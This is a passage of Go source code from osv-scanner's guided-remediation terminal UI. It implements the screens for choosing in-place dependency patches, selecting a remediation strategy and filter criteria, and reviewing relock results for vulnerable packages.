st.ResizeInfo(m.infoViewWidth, m.infoViewHeight) return nil } func (st *stateChooseInPlacePatches) Update(m model, msg tea.Msg) (tea.Model, tea.Cmd) { var cmd tea.Cmd if msg, ok := msg.(tea.KeyPressMsg); ok { switch { case key.Matches(msg, tui.Keys.SwitchView): if st.IsInfoFocused() { st.focusedInfo = nil st.table.Focus() } else if view, canFocus := st.currentInfoView(); canFocus { st.focusedInfo = view st.table.Blur() // ignore key presses when the info view is focused } case st.IsInfoFocused(): st.focusedInfo, cmd = st.focusedInfo.Update(msg) // VulnInfo returns nil as the model when it wants to exit, instead of the CloseViewModel Cmd // if it quits, we need to re-focus the table if st.focusedInfo == nil { st.table.Focus() } case key.Matches(msg, tui.Keys.Quit): // go back to in-place results m.st = st.stateInPlace return m, nil case key.Matches(msg, 
tui.Keys.Select): if st.table.Cursor() == len(st.table.Rows())-1 { // hit enter on done line // go back to in-place results m.st = st.stateInPlace return m, nil } if st.table.Cursor() == 0 { // select/deselect all // if nothing is selected, set everything to true, otherwise set everything to false selection := !slices.Contains(st.stateInPlace.selectedChanges, true) for i := range st.stateInPlace.selectedChanges { st.stateInPlace.selectedChanges[i] = selection } } else { st.toggleSelection(st.table.Cursor() - 1) } st.updateTableRows(m) } } // update the table t, c := st.table.Update(msg) st.table = t return m, tea.Batch(cmd, c) } func (st *stateChooseInPlacePatches) View(_ model) string { tableStr := lipgloss.PlaceHorizontal(st.viewWidth, lipgloss.Center, st.table.View()) return lipgloss.JoinVertical(lipgloss.Left, tableStr, tui.RenderSelectorOption(st.table.Cursor() == len(st.table.Rows())-1, " > ", "%s", "Done"), ) } func (st *stateChooseInPlacePatches) InfoView() string { v, _ := st.currentInfoView() return v.View() } func (st *stateChooseInPlacePatches) updateTableRows(m model) { // update the checkbox for each row rows := st.table.Rows() anySelected := false for i, pIdx := range st.patchIdx { // don't render a checkbox on the empty lines if rows[i+1][0] == "" { continue } var checkBox string if st.stateInPlace.selectedChanges[pIdx] { checkBox = "[x]" anySelected = true } else { checkBox = "[ ]" } rows[i+1][0] = fmt.Sprintf("%s %s", checkBox, m.inPlaceResult.Patches[pIdx].Pkg.Name) } // show select all only if nothing is selected, // show deselect all if anything is selected if anySelected { rows[0][0] = "DESELECT ALL" } else { rows[0][0] = "SELECT ALL" } st.table.SetRows(rows) // there is no table.Columns() method, so I can't resize the columns to fit the checkbox properly :( } func (st *stateChooseInPlacePatches) toggleSelection(idx int) { // TODO: Prevent selection of multiple (incompatible) patches for same package version i := st.patchIdx[idx] 
st.stateInPlace.selectedChanges[i] = !st.stateInPlace.selectedChanges[i] } func (st *stateChooseInPlacePatches) currentInfoView() (view tui.ViewModel, canFocus bool) { if c := st.table.Cursor(); c > 0 && c < len(st.table.Rows())-1 { return st.vulnsInfos[c-1], true } return emptyInfoView, false } func (st *stateChooseInPlacePatches) Resize(w, h int) { st.viewWidth = w st.table.SetWidth(w) st.table.SetHeight(h - 1) // -1 to account for 'Done' line at bottom } func (st *stateChooseInPlacePatches) ResizeInfo(w, h int) { for _, info := range st.vulnsInfos { info.Resize(w, h) } } func (st *stateChooseInPlacePatches) IsInfoFocused() bool { return st.focusedInfo != nil } ================================================ FILE: cmd/osv-scanner/fix/state-choose-strategy.go ================================================ package fix import ( "fmt" "slices" "strconv" "strings" "charm.land/bubbles/v2/key" "charm.land/bubbles/v2/textinput" tea "charm.land/bubbletea/v2" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/tui" ) type stateChooseStrategy struct { cursorPos int // TODO: use an enum canRelock bool vulnList tui.ViewModel inPlaceInfo tui.ViewModel relockFixVulns tui.ViewModel errorsView tui.ViewModel depthInput textinput.Model severityInput textinput.Model focusedInfo tui.ViewModel // the infoview that is currently focused, nil if not focused } const ( stateChooseInfo = iota stateChooseErrors stateChooseInPlace stateChooseRelock stateChooseDepth stateChooseSeverity stateChooseDev stateChooseApplyCriteria stateChooseQuit stateChooseEnd ) func (st *stateChooseStrategy) Init(m model) tea.Cmd { st.cursorPos = stateChooseInPlace // pre-generate the info views for each option // make a slice of vuln pointers for the all vulnerabilities list // TODO: be consistent & efficient with how we pass resolution.Vulnerabilities around var allVulns []*resolution.Vulnerability for _, p 
:= range m.inPlaceResult.Patches { for i := range p.ResolvedVulns { allVulns = append(allVulns, &p.ResolvedVulns[i]) } } for i := range m.inPlaceResult.Unfixable { allVulns = append(allVulns, &m.inPlaceResult.Unfixable[i]) } st.vulnList = tui.NewVulnList(allVulns, "") // make the in-place view st.inPlaceInfo = tui.NewInPlaceInfo(*m.inPlaceResult) if m.options.Manifest != "" { // find the vulns fixed by relocking to show on the relock hover st.canRelock = true var relockFixes []*resolution.Vulnerability for _, v := range allVulns { if !slices.ContainsFunc(m.relockBaseRes.Vulns, func(r resolution.Vulnerability) bool { return r.OSV.GetId() == v.OSV.GetId() }) { relockFixes = append(relockFixes, v) } } st.relockFixVulns = tui.NewVulnList(relockFixes, "Relocking fixes the following vulns:") st.ResizeInfo(m.infoViewWidth, m.infoViewHeight) } else { st.canRelock = false st.relockFixVulns = infoStringView("Re-run with manifest to resolve vulnerabilities by re-locking") } st.depthInput = textinput.New() st.depthInput.CharLimit = 3 st.depthInput.SetValue(strconv.Itoa(m.options.MaxDepth)) st.severityInput = textinput.New() st.severityInput.CharLimit = 4 st.severityInput.SetValue(strconv.FormatFloat(m.options.MinSeverity, 'g', -1, 64)) st.errorsView = resolutionErrorView(m.relockBaseRes, m.relockBaseResErrs) return nil } func (st *stateChooseStrategy) Update(m model, msg tea.Msg) (tea.Model, tea.Cmd) { switch msg := msg.(type) { case tui.ViewModelCloseMsg: // info view wants to quit, just unfocus it st.focusedInfo = nil case tea.KeyPressMsg: switch { case key.Matches(msg, tui.Keys.SwitchView): if st.IsInfoFocused() { st.focusedInfo = nil } else if view, canFocus := st.currentInfoView(); canFocus { st.focusedInfo = view } case st.IsInfoFocused(): var cmd tea.Cmd st.focusedInfo, cmd = st.focusedInfo.Update(msg) return m, cmd case key.Matches(msg, tui.Keys.Quit): // only quit if the cursor is over the quit line if st.cursorPos == stateChooseQuit { return m, tea.Quit } // 
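// otherwise move the cursor to the quit line if it's not already there
			st.cursorPos = stateChooseQuit
		case key.Matches(msg, tui.Keys.Select):
			// enter key was pressed, parse input
			return st.parseInput(m)
		// move the cursor and show the corresponding info view
		case key.Matches(msg, tui.Keys.Up):
			if st.cursorPos > stateChooseInfo {
				st.cursorPos--
				// Resolution errors aren't rendered if there are none
				if st.cursorPos == stateChooseErrors && len(m.relockBaseResErrs) == 0 {
					st.cursorPos--
				}
			}
			st.UpdateTextFocus()
		case key.Matches(msg, tui.Keys.Down):
			if st.cursorPos < stateChooseEnd-1 {
				st.cursorPos++
				// Skip the errors line in this direction too when it is not rendered.
				if st.cursorPos == stateChooseErrors && len(m.relockBaseResErrs) == 0 {
					st.cursorPos++
				}
			}
			st.UpdateTextFocus()
		}
	}
	// Both text inputs receive every message that reaches this point; Update is
	// called on each whether or not it is focused.
	cmds := make([]tea.Cmd, 0, 2)
	var cmd tea.Cmd
	st.depthInput, cmd = st.depthInput.Update(msg)
	cmds = append(cmds, cmd)
	st.severityInput, cmd = st.severityInput.Update(msg)
	cmds = append(cmds, cmd)
	return m, tea.Batch(cmds...)
}

// UpdateTextFocus blurs both text inputs, then focuses the one under the cursor, if any.
func (st *stateChooseStrategy) UpdateTextFocus() {
	st.depthInput.Blur()
	st.severityInput.Blur()
	switch st.cursorPos {
	case stateChooseDepth:
		st.depthInput.Focus()
	case stateChooseSeverity:
		st.severityInput.Focus()
	}
}

// IsInfoFocused reports whether an info view currently has focus.
func (st *stateChooseStrategy) IsInfoFocused() bool {
	return st.focusedInfo != nil
}

// currentInfoView returns the info view that belongs to the line under the
// cursor, and whether that view may take focus.
func (st *stateChooseStrategy) currentInfoView() (view tui.ViewModel, canFocus bool) {
	switch st.cursorPos {
	case stateChooseInfo: // info line
		return st.vulnList, true
	case stateChooseErrors:
		return st.errorsView, false
	case stateChooseInPlace: // in-place
		return st.inPlaceInfo, true
	case stateChooseRelock: // relock
		return st.relockFixVulns, st.canRelock
	case stateChooseQuit: // quit
		return infoStringView("Exit Guided Remediation"), false
	default:
		return emptyInfoView, false
	}
}

// parseInput handles the select key for the line under the cursor and returns
// the possibly updated model together with the command to run next.
//
// Applying the criteria recomputes the in-place patches. If that fails, the
// error is handed to errorAndExit, as the writeMsg handler in
// stateInPlaceResult.Update does, instead of panicking inside the running TUI.
func (st *stateChooseStrategy) parseInput(m model) (tea.Model, tea.Cmd) {
	var cmd tea.Cmd
	switch st.cursorPos {
	case stateChooseInfo: // info line, focus on info view
		st.focusedInfo = st.vulnList
	case stateChooseInPlace: // in-place
		// initially have every change be selected to be applied
		selected := make([]bool, len(m.inPlaceResult.Patches))
		for i := range selected {
			selected[i] = true
		}
		m.st = &stateInPlaceResult{inPlaceInfo: st.inPlaceInfo, selectedChanges: selected}
		cmd = m.st.Init(m)
	case stateChooseRelock: // relock
		if st.canRelock {
			m.st = &stateRelockResult{}
			cmd = m.st.Init(m)
		}
	case stateChooseDev:
		m.options.DevDeps = !m.options.DevDeps
	case stateChooseApplyCriteria:
		// Text that does not parse is ignored and the previous value is kept.
		// Values that do parse are stored as entered, with no range check here.
		maxDepth, err := strconv.Atoi(st.depthInput.Value())
		if err == nil {
			m.options.MaxDepth = maxDepth
		}
		minSeverity, err := strconv.ParseFloat(st.severityInput.Value(), 64)
		if err == nil {
			m.options.MinSeverity = minSeverity
		}
		// Reset state. TODO: Add a spinner and do this I/O as a command.
		res, err := remediation.ComputeInPlacePatches(m.ctx, m.cl, m.lockfileGraph, m.options.Options)
		if err != nil {
			// Exit through the normal error path rather than panicking mid-render.
			return errorAndExit(m, err)
		}
		m.inPlaceResult = &res
		m.relockBaseRes.FilterVulns(m.options.MatchVuln)
		m.st = &stateChooseStrategy{}
		cmd = m.st.Init(m)
	case stateChooseQuit: // quit line
		cmd = tea.Quit
	}
	return m, cmd
}

// View renders the strategy selection screen: vulnerability counts, the
// available actions and the filter criteria.
func (st *stateChooseStrategy) View(m model) string {
	vulnCount := m.inPlaceResult.VulnCount()
	fixCount := vulnCount.Total() - len(m.inPlaceResult.Unfixable)
	pkgChange := len(m.inPlaceResult.Patches)
	s := strings.Builder{}
	s.WriteString(tui.RenderSelectorOption(
		st.cursorPos == stateChooseInfo,
		"",
		fmt.Sprintf("Found %%s in lockfile (%d direct, %d transitive, %d dev only) matching the criteria.\n", vulnCount.Direct, vulnCount.Transitive, vulnCount.Dev),
		fmt.Sprintf("%d vulnerabilities", vulnCount.Total()),
	))
	// The errors line is only rendered when resolution produced errors.
	if len(m.relockBaseResErrs) > 0 {
		s.WriteString(tui.RenderSelectorOption(
			st.cursorPos == stateChooseErrors,
			"",
			"WARNING: Encountered %s during graph resolution.\n",
			fmt.Sprintf("%d errors", len(m.relockBaseResErrs)),
		))
	}
	s.WriteString("\n")
	s.WriteString("Actions:\n")
	s.WriteString(tui.RenderSelectorOption(
		st.cursorPos == stateChooseInPlace,
		" > ",
		fmt.Sprintf("%%s (fixes %d/%d vulns, changes %d packages)\n", fixCount, vulnCount.Total(), pkgChange),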
"Modify lockfile in-place", )) // TODO: skip choseStrategy when relocking is unavailable if st.canRelock { // TODO: In-place and relock count vulns differently; this number is wrong relockFix := vulnCount.Total() - len(m.relockBaseRes.Vulns) s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateChooseRelock, " > ", fmt.Sprintf("%%s (fixes %d/%d vulns) and try direct dependency upgrades\n", relockFix, vulnCount.Total()), "Re-lock project", )) } else { s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateChooseRelock, " > ", tui.DisabledTextStyle.Render("Cannot re-lock - missing manifest file\n"), )) } s.WriteString("\n") s.WriteString("Criteria:\n") s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateChooseDepth, " > ", fmt.Sprintf("%%s: %s\n", st.depthInput.View()), "Max dependency depth", )) s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateChooseSeverity, " > ", fmt.Sprintf("%%s: %s\n", st.severityInput.View()), "Min CVSS score", )) devString := "YES" if m.options.DevDeps { devString = "NO" } s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateChooseDev, " > ", fmt.Sprintf("%%s: %s\n", devString), "Exclude dev only", )) s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateChooseApplyCriteria, " > ", "%s\n", "Apply criteria", )) s.WriteString("\n") s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateChooseQuit, "> ", "%s\n", "quit", )) return s.String() } func (st *stateChooseStrategy) InfoView() string { v, _ := st.currentInfoView() return v.View() } func (st *stateChooseStrategy) Resize(_, _ int) {} func (st *stateChooseStrategy) ResizeInfo(w, h int) { st.vulnList.Resize(w, h) st.inPlaceInfo.Resize(w, h) st.relockFixVulns.Resize(w, h) } ================================================ FILE: cmd/osv-scanner/fix/state-in-place-result.go ================================================ package fix import ( "fmt" "slices" "strings" "charm.land/bubbles/v2/key" tea "charm.land/bubbletea/v2" 
"github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/resolution" lockf "github.com/google/osv-scanner/v2/internal/resolution/lockfile" "github.com/google/osv-scanner/v2/internal/tui" ) type stateInPlaceResult struct { cursorPos int // TODO: use an enum canRelock bool selectedChanges []bool // in-place changes to be applied vulnList tui.ViewModel inPlaceInfo tui.ViewModel relockFixVulns tui.ViewModel focusedInfo tui.ViewModel // the infoview that is currently focused, nil if not focused } const ( stateInPlaceFixed = iota stateInPlaceRemain stateInPlaceChoice stateInPlaceWrite stateInPlaceRelock stateInPlaceQuit stateInPlaceEnd ) func (st *stateInPlaceResult) Init(m model) tea.Cmd { // pre-generate the info views for each option // inPlaceInfo is given to this by stateChooseStrategy when it makes this struct // Get the list of remaining vulns vulns := make([]*resolution.Vulnerability, len(m.inPlaceResult.Unfixable)) for i := range m.inPlaceResult.Unfixable { vulns[i] = &m.inPlaceResult.Unfixable[i] } st.vulnList = tui.NewVulnList(vulns, "") // recompute the vulns fixed by relocking after the in-place update if m.options.Manifest != "" { st.canRelock = true var relockFixes []*resolution.Vulnerability for _, v := range vulns { if !slices.ContainsFunc(m.relockBaseRes.Vulns, func(r resolution.Vulnerability) bool { return r.OSV.GetId() == v.OSV.GetId() }) { relockFixes = append(relockFixes, v) } } st.relockFixVulns = tui.NewVulnList(relockFixes, "Relocking fixes the following vulns:") } else { st.canRelock = false st.relockFixVulns = infoStringView("Re-run with manifest to resolve vulnerabilities by re-locking") } st.cursorPos = stateInPlaceChoice st.ResizeInfo(m.infoViewWidth, m.infoViewHeight) return nil } func (st *stateInPlaceResult) Update(m model, msg tea.Msg) (tea.Model, tea.Cmd) { var cmd tea.Cmd switch msg := msg.(type) { case writeMsg: // just finished writing & installing the lockfile if msg.err != nil { return 
errorAndExit(m, msg.err) } m.writing = false // remove the written in-place changes var newPatches []remediation.InPlacePatch for i, selected := range st.selectedChanges { if !selected { newPatches = append(newPatches, m.inPlaceResult.Patches[i]) } } m.inPlaceResult.Patches = newPatches // unselect all changes st.selectedChanges = make([]bool, len(newPatches)) // regenerate the in-place info panel st.inPlaceInfo = tui.NewInPlaceInfo(*m.inPlaceResult) return m, cmd case tui.ViewModelCloseMsg: // info view wants to quit, just unfocus it st.focusedInfo = nil case tea.KeyPressMsg: switch { case key.Matches(msg, tui.Keys.SwitchView): if st.IsInfoFocused() { st.focusedInfo = nil } else if view, canFocus := st.currentInfoView(); canFocus { st.focusedInfo = view } case st.IsInfoFocused(): st.focusedInfo, cmd = st.focusedInfo.Update(msg) case key.Matches(msg, tui.Keys.Quit): // only quit if the cursor is over the quit line if st.cursorPos == stateInPlaceQuit { return m, tea.Quit } // move the cursor to the quit line if it's not already there st.cursorPos = stateInPlaceQuit case key.Matches(msg, tui.Keys.Select): // enter key was pressed, parse input return st.parseInput(m) // move the cursor and show the corresponding info view case key.Matches(msg, tui.Keys.Up): if st.cursorPos > stateInPlaceFixed { st.cursorPos-- } case key.Matches(msg, tui.Keys.Down): if st.cursorPos < stateInPlaceEnd-1 { st.cursorPos++ } } } return m, cmd } func (st *stateInPlaceResult) currentInfoView() (view tui.ViewModel, canFocus bool) { switch st.cursorPos { case stateInPlaceFixed: // info - fixed vulns return st.inPlaceInfo, true case stateInPlaceRemain: // info - remaining vulns return st.vulnList, true case stateInPlaceChoice: // choose changes return infoStringView("Choose which changes to apply"), false case stateInPlaceWrite: // write return infoStringView("Write changes to lockfile"), false case stateInPlaceRelock: // relock return st.relockFixVulns, st.canRelock case stateInPlaceQuit: // 
quit return infoStringView("Exit Guided Remediation"), false default: return emptyInfoView, false } } func (st *stateInPlaceResult) parseInput(m model) (tea.Model, tea.Cmd) { var cmd tea.Cmd switch st.cursorPos { case stateInPlaceFixed, stateInPlaceRemain: // info lines, focus info view v, _ := st.currentInfoView() st.focusedInfo = v case stateInPlaceChoice: // choose specific patches m.st = &stateChooseInPlacePatches{stateInPlace: st} cmd = m.st.Init(m) case stateInPlaceWrite: // write m.writing = true cmd = func() tea.Msg { return st.write(m) } case stateInPlaceRelock: // relock if st.canRelock { m.st = &stateRelockResult{} cmd = m.st.Init(m) } case stateInPlaceQuit: // quit cmd = tea.Quit } return m, cmd } func (st *stateInPlaceResult) View(m model) string { if m.writing { return "" } remainCount := len(m.inPlaceResult.Unfixable) fixCount := m.inPlaceResult.VulnCount().Total() - remainCount pkgCount := len(m.inPlaceResult.Patches) nSelected := 0 for _, s := range st.selectedChanges { if s { nSelected++ } } s := strings.Builder{} s.WriteString("IN-PLACE\n") // TODO: better page title/layout s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateInPlaceFixed, "", fmt.Sprintf("%%s can be changed, fixing %d vulnerabilities\n", fixCount), fmt.Sprintf("%d packages", pkgCount), )) s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateInPlaceRemain, "", "%s remain\n", fmt.Sprintf("%d vulnerabilities", remainCount), )) s.WriteString("\n") s.WriteString("Actions:\n") s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateInPlaceChoice, " > ", "%s which changes to apply\n", "Choose", )) s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateInPlaceWrite, " > ", fmt.Sprintf("%%s %d changes to lockfile\n", nSelected), "Write", )) if st.canRelock { s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateInPlaceRelock, " > ", "%s the whole project instead\n", "Relock", )) } else { s.WriteString(tui.RenderSelectorOption( st.cursorPos == 
stateInPlaceRelock, " > ", tui.DisabledTextStyle.Render("Cannot re-lock - missing manifest file\n"), )) } s.WriteString("\n") s.WriteString(tui.RenderSelectorOption( st.cursorPos == stateInPlaceQuit, "> ", "%s without saving changes\n", "quit", )) return s.String() } func (st *stateInPlaceResult) InfoView() string { v, _ := st.currentInfoView() return v.View() } func (st *stateInPlaceResult) Resize(_, _ int) {} func (st *stateInPlaceResult) ResizeInfo(w, h int) { st.inPlaceInfo.Resize(w, h) st.vulnList.Resize(w, h) st.relockFixVulns.Resize(w, h) } func (st *stateInPlaceResult) IsInfoFocused() bool { return st.focusedInfo != nil } // TODO: Work out a better way to output npm commands func (st *stateInPlaceResult) write(m model) tea.Msg { var changes []lockf.DependencyPatch for i, p := range m.inPlaceResult.Patches { if st.selectedChanges[i] { changes = append(changes, p.DependencyPatch) } } if err := lockf.Overwrite(m.options.LockfileRW, m.options.Lockfile, changes); err != nil { return writeMsg{err} } return writeMsg{nil} } ================================================ FILE: cmd/osv-scanner/fix/state-initialize.go ================================================ package fix import ( "fmt" "strings" "charm.land/bubbles/v2/spinner" tea "charm.land/bubbletea/v2" "github.com/google/osv-scanner/v2/internal/tui" ) type stateInitialize struct { spinner spinner.Model // the loading spinner used to show progress } func (st *stateInitialize) Init(m model) tea.Cmd { // create the loading spinner st.spinner = tui.NewSpinner() cmds := []tea.Cmd{st.spinner.Tick} // TODO: both in-place/relock could potentially be done in parallel if m.options.Lockfile != "" { // if we have a lockfile, start calculating the in-place updates cmds = append(cmds, func() tea.Msg { return doInPlaceResolution(m.ctx, m.cl, m.options) }) } else { // if we don't have a lockfile, start calculating the relock result cmds = append(cmds, func() tea.Msg { return doInitialRelock(m.ctx, m.options) }) } return 
tea.Batch(cmds...) } func (st *stateInitialize) Update(m model, msg tea.Msg) (tea.Model, tea.Cmd) { var cmds []tea.Cmd switch msg := msg.(type) { // in-place resolution finished case inPlaceResolutionMsg: if msg.err != nil { return errorAndExit(m, msg.err) } // set the result and start the relock computation m.lockfileGraph = msg.g m.inPlaceResult = &msg.res if m.options.Manifest != "" { cmds = append(cmds, func() tea.Msg { return doInitialRelock(m.ctx, m.options) }) } else { // TODO: skip choose strategy, go straight to in-place m.st = &stateChooseStrategy{} cmds = append(cmds, m.st.Init(m)) } // relocking finished case doRelockMsg: if msg.err != nil { return errorAndExit(m, msg.err) } // set the result and go to next state m.relockBaseRes = msg.res m.relockBaseResErrs = m.relockBaseRes.Errors() if m.options.Lockfile == "" { m.st = &stateRelockResult{} cmds = append(cmds, m.st.Init(m)) } else { m.st = &stateChooseStrategy{} cmds = append(cmds, m.st.Init(m)) } } var c tea.Cmd st.spinner, c = st.spinner.Update(msg) cmds = append(cmds, c) return m, tea.Batch(cmds...) } func (st *stateInitialize) View(m model) string { s := strings.Builder{} if m.options.Lockfile == "" { s.WriteString("No lockfile provided. 
Assuming re-lock.\n") } else { fmt.Fprintf(&s, "Scanning %s ", tui.SelectedTextStyle.Render(m.options.Lockfile)) if m.inPlaceResult == nil { s.WriteString(st.spinner.View()) s.WriteString("\n") return s.String() } s.WriteString("✓\n") } fmt.Fprintf(&s, "Resolving %s ", tui.SelectedTextStyle.Render(m.options.Manifest)) if m.relockBaseRes == nil { s.WriteString(st.spinner.View()) s.WriteString("\n") } else { s.WriteString("✓\n") } // TODO: show non-fatal resolution errors somewhere return s.String() } func (st *stateInitialize) InfoView() string { return "" } func (st *stateInitialize) Resize(_, _ int) {} func (st *stateInitialize) ResizeInfo(_, _ int) {} func (st *stateInitialize) IsInfoFocused() bool { return false } ================================================ FILE: cmd/osv-scanner/fix/state-relock-result.go ================================================ package fix import ( "context" "fmt" "strings" "charm.land/bubbles/v2/key" "charm.land/bubbles/v2/spinner" tea "charm.land/bubbletea/v2" "charm.land/lipgloss/v2" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/client" manif "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/tui" ) type stateRelockResult struct { currRes *resolution.Result // In-progress relock result, with user-selected patches applied currErrs []resolution.NodeError // In-progress relock errors patches []resolution.Difference // current possible patches applicable to relockCurrRes patchesDone bool // whether the relockPatches has finished being computed numUnfixable int // count of unfixable vulns, for rendering spinner spinner.Model cursorPos int // TODO: use an enum ? 
selectedPatches map[int]struct{} // currently pending selected patches (keys are indexes into patches)
	viewWidth       int              // width for rendering (same as model.mainViewWidth)

	vulnList      tui.ViewModel
	unfixableList tui.ViewModel
	patchInfo     []tui.ViewModel
	resolveErrors tui.ViewModel

	focusedInfo tui.ViewModel // the infoview that is currently focused, nil if not focused
}

// Row identifiers for the relock screen, in display order. These are
// "effective" positions: the patch list occupies a variable number of raw
// cursor slots, which getEffectiveCursor / setEffectiveCursor translate.
// stateRelockEnd is one past the last selectable row.
const (
	stateRelockRemain = iota
	stateRelockUnfixable
	stateRelockErrors
	stateRelockPatches
	stateRelockApply
	stateRelockWrite
	stateRelockQuit
	stateRelockEnd
)

// gets the cursor position, accounting for the arbitrary number of relockPatches
// returns stateRelockPatches if over ANY of the relockPatches
//
// Rows before the patch list map to themselves. With no patches, both the
// patch row and the apply row are absent, so later raw positions shift by 2.
// Otherwise rows after the patch list shift by len(st.patches)-1.
func (st *stateRelockResult) getEffectiveCursor() int {
	if st.cursorPos < stateRelockPatches {
		return st.cursorPos
	}

	if len(st.patches) == 0 {
		// skip over stateRelockPatches and stateRelockApply
		return st.cursorPos + 2
	}

	if st.cursorPos < stateRelockPatches+len(st.patches) {
		return stateRelockPatches
	}

	return st.cursorPos - len(st.patches) + 1
}

// sets the cursor to the effective position, accounting for the arbitrary number of relockPatches
// setting to stateRelockPatches will go to first patch
//
// This is the inverse of getEffectiveCursor for rows after the patch list.
func (st *stateRelockResult) setEffectiveCursor(pos int) {
	switch {
	case pos <= stateRelockPatches:
		st.cursorPos = pos
	case len(st.patches) == 0:
		st.cursorPos = pos - 2
	default:
		st.cursorPos = pos + len(st.patches) - 1
	}
}

// get the index of the patch the cursor is currently over
//
// The result is only a valid index into st.patches / st.patchInfo while
// getEffectiveCursor() == stateRelockPatches; callers check that first.
func (st *stateRelockResult) getPatchIndex() int {
	return st.cursorPos - stateRelockPatches
}

// Init seeds the relock screen from the model's base relock result, builds the
// vulnerability list view, and starts the first patch computation together
// with the spinner tick.
func (st *stateRelockResult) Init(m model) tea.Cmd {
	st.currRes = m.relockBaseRes
	st.currErrs = m.relockBaseResErrs
	st.resolveErrors = resolutionErrorView(st.currRes, st.currErrs)
	st.patchesDone = false
	st.spinner = tui.NewSpinner()
	st.cursorPos = -1 // no row selected until the patch list arrives
	st.selectedPatches = make(map[int]struct{})
	st.viewWidth = m.mainViewWidth

	// Make the vulnerability list view model
	vulns := make([]*resolution.Vulnerability, len(st.currRes.Vulns))
	for i := range st.currRes.Vulns {
		vulns[i] = &st.currRes.Vulns[i]
	}
	st.vulnList = tui.NewVulnList(vulns, "")
	st.ResizeInfo(m.infoViewWidth, m.infoViewHeight)

	return tea.Batch(
		func() tea.Msg { return doComputeRelockPatches(m.ctx, m.cl, st.currRes, m.options) }, // start computing possible patches
		st.spinner.Tick, // spin the spinner
	)
}

// Update handles the messages of the relock screen: finished resolutions,
// finished patch computations, finished writes, info-view close requests and
// key presses. The spinner is updated on every message that reaches the end.
func (st *stateRelockResult) Update(m model, msg tea.Msg) (tea.Model, tea.Cmd) {
	var cmd tea.Cmd
	switch msg := msg.(type) {
	case doRelockMsg: // finished resolving (after selecting multiple patches)
		if msg.err != nil {
			return errorAndExit(m, msg.err)
		}
		st.currRes = msg.res
		// recreate the vuln list info view
		vulns := make([]*resolution.Vulnerability, len(st.currRes.Vulns))
		for i := range st.currRes.Vulns {
			vulns[i] = &st.currRes.Vulns[i]
		}
		st.vulnList = tui.NewVulnList(vulns, "")
		st.currErrs = st.currRes.Errors()
		st.resolveErrors = resolutionErrorView(st.currRes, st.currErrs)
		// Compute possible patches again
		st.patchesDone = false
		cmd = func() tea.Msg { return doComputeRelockPatches(m.ctx, m.cl, st.currRes, m.options) }

	case relockPatchMsg: // patch computation done
		if msg.err != nil {
			return errorAndExit(m, msg.err)
		}
		st.patches = msg.patches
		// Old selections index into the previous patch slice, so drop them.
		clear(st.selectedPatches)
		st.buildPatchInfoViews(m)
		st.patchesDone = true
		if len(st.patches) > 0 {
			// place the cursor on the first patch
			st.setEffectiveCursor(stateRelockPatches)
		} else {
			// no patches, place the cursor on the 'write' line
			st.setEffectiveCursor(stateRelockWrite)
		}

	case writeMsg: // just finished writing & installing the manifest
		if msg.err != nil {
			return errorAndExit(m, msg.err)
		}
		m.writing = false
		m.relockBaseRes = st.currRes // relockBaseRes must match what is in the package.json
		m.relockBaseResErrs = m.relockBaseRes.Errors()
		clear(st.selectedPatches)

	case tui.ViewModelCloseMsg:
		// info view wants to quit, just unfocus it
		st.focusedInfo = nil

	case tea.KeyPressMsg:
		// This is the only gate on key input while background work runs, so
		// every path that starts a resolve or patch computation has to clear
		// patchesDone before it returns.
		if !st.patchesDone { // Don't accept input in the middle of computation
			return m, nil
		}
		switch {
		case key.Matches(msg, tui.Keys.SwitchView):
			if st.IsInfoFocused() {
				st.focusedInfo = nil
			} else if view, canFocus := st.currentInfoView(); canFocus {
				st.focusedInfo = view
			}
		case st.IsInfoFocused():
			// While an info view has focus, every other key goes to it.
			st.focusedInfo, cmd = st.focusedInfo.Update(msg)
		case key.Matches(msg, tui.Keys.Quit):
			// only quit if the cursor is over the quit line
			if st.getEffectiveCursor() == stateRelockQuit {
				return m, tea.Quit
			}
			// move the cursor to the quit line if it's not already there
			st.setEffectiveCursor(stateRelockQuit)
		case key.Matches(msg, tui.Keys.Select): // enter key pressed
			return st.parseInput(m)
		// move the cursor
		case key.Matches(msg, tui.Keys.Up):
			if st.getEffectiveCursor() > stateRelockRemain {
				st.cursorPos--
				// The errors row is not rendered when there are no errors; step past it.
				if st.getEffectiveCursor() == stateRelockErrors && len(st.currErrs) == 0 {
					st.cursorPos--
				}
			}
		case key.Matches(msg, tui.Keys.Down):
			if st.getEffectiveCursor() < stateRelockEnd-1 {
				st.cursorPos++
				// The errors row is not rendered when there are no errors; step past it.
				if st.getEffectiveCursor() == stateRelockErrors && len(st.currErrs) == 0 {
					st.cursorPos++
				}
			}
		}
	}

	var c tea.Cmd
	st.spinner, c = st.spinner.Update(msg)

	return m, tea.Batch(cmd, c)
}

// currentInfoView returns the info panel for the row under the cursor and
// whether that panel can take focus.
func (st *stateRelockResult) currentInfoView() (view tui.ViewModel, canFocus bool) {
	switch st.getEffectiveCursor() {
	case stateRelockRemain: // remaining vulns
		return st.vulnList, true
	case stateRelockUnfixable: // unfixable vulns
		return st.unfixableList, true
	case stateRelockErrors:
		return st.resolveErrors, false
	case stateRelockPatches: // one of the patches
		return st.patchInfo[st.getPatchIndex()], true
	case stateRelockApply:
		return infoStringView("Apply the selected patches and recompute vulnerabilities"), false
	case stateRelockWrite:
		return infoStringView("Shell out to write manifest & lockfile"), false
	case stateRelockQuit:
		return infoStringView("Exit Guided Remediation"), false
	default:
